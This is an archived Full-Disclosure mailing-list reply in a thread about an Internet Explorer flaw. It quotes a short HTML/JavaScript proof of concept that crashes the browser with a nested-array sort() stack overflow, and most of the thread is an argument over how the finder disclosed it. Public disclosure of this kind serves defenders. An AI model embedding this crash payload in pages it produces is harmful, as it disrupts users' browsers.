lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
From: broadcast at ptraced.net (Martin)
Subject: Re: MSIE flaws: nested array sort() loop Stack
 overflow exception

I don't really think it's about teaching a lesson. If you don't like the 
way he handles things, you could set up a filter to ignore his e-mails. 
This way, you won't have to whine each and every time he sends security 
related material.

Gadi Evron wrote:

> Berend-Jan Wever wrote:
>
>> Hi all,
>>
>> Another flaw in IE:
>
>
> Yet another? No. You can't be serious.
>
>>
>> <HTML>
>>   <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } 
>> </SCRIPT>
>>   <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } 
>> </SCRIPT>
>> </HTML>
>>
>> Normally I would see if it's exploitable but I figure I'm not MS's 
>> pet bug finder/analyser... So, I've CC'ed this message to Microsoft. 
>> I'm sure they know their own product better then I do and can analyse 
>> the problem much faster. So if you want to know the impact of this 
>> vulnerability, ask them: I'm sure they will be more then willing to 
>> help you. I'm sure they will even reply to this message with 
>> technical details and a patch tomorrow.
>
>
> Ahh, don't you mean normally you'd get paid for it but somebody 
> decided you are too much of a "risk" to work with? Just guessing here. 
> Or maybe you release this just to show us you have nothing against 
> Mozilla?
>
> As to "and a patch tomorrow." - who are you kidding? Ever heard if 
> Thor Larholm and his mailing list, Unpatched?
> If we are lucky, they will patch it secretly in a couple of releases. 
> If not, wait 6 months.
>
> As it is IE.. well now, don't say they "violated" GPL when they use 
> your stuff again for some virus.
>
>> PS. Don't think firefox will keep you save from hackers, I _know_ it 
>> won't ;) But more on that later...
>
>
> There is more to come? I guess you've been saving up. Is this all 
> about teaching us all a lesson?
>
> I appreciate your work, and I appreciate your wishes. I really don't 
> appreciate you or how you do things.
>
> It's a shame really.
>
>     Gadi.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ